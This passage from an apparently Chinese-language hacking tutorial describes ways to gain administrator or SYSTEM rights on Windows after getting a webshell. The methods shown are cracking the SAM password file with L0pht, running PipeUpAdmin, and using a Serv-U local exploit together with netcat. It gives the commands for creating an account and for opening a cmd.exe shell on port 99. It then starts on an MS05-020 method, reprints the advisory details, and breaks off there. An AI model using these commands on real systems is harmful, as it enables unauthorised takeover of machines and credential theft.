下载系统的 %windir%\repair\sam.*(WinNT 4 下是 sam._ 而 Windows 2000 下是 sam)文件,
然后用 L0pht 等软件进行破解,只要能拿到,肯花时间,就一定可以破解。
****************************************************************************
第八
PipeUpAdmin(Windows 2000 下), 在本机运行可以把当前用户帐号加入管理员组。普通用
户和 Guests 组用户都可以成功运行。
****************************************************************************
第九
Serv-u Ftp Server 本地权限提升漏洞:
很 多 主 机 的 C:\Documents and Settings\All Users\ Documents 目 录 以 及 下 边 几 个 子 目 录
Documents 没有设置权限,导致可以在这个目录上传并运行 Exp. 直接上传了 serv-u local
exploit 和 nc, 并且把 serv-u 的本地提升权限的名字命名为 su.exe 文件就放在 C:\Documents
and Settings\All Users\ Documents, 然后我们用 su.exe 直接建立用户,也可以反弹一个 shell 过
来的。
具体命令:
建立用户: serv-u.exe "cmd"
>USER xl
>PASS 111111
反弹 shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
很不错的提权新方法
今天我要带给大家的是,当我们得到 WEBSHELL 后如何得到 SYSTEM 权限的新方法, 提
升权限这个已经是老生常谈了,网络上已经有很多种提升权限的方法了,在这里我就不在
提了,今天我给大家介绍的是就是主动利用 MS05020 漏洞来达到我们提升权限的目的。
MS05020 是一个 IE 漏洞,2005.4 份的时候微软就发步了这个公告:
安全漏洞 CN-VA05-025
发布日期:2005-04-13
漏洞类型:远程执行代码
漏洞评估:高危
受影响版本:
Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows Server 2003
Microsoft Windows Server 2003(用于基于 Itanium 的系统)Microsoft Windows 98、Microsoft
Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME) 测试过的
Microsoft Windows 组件:
漏洞描述: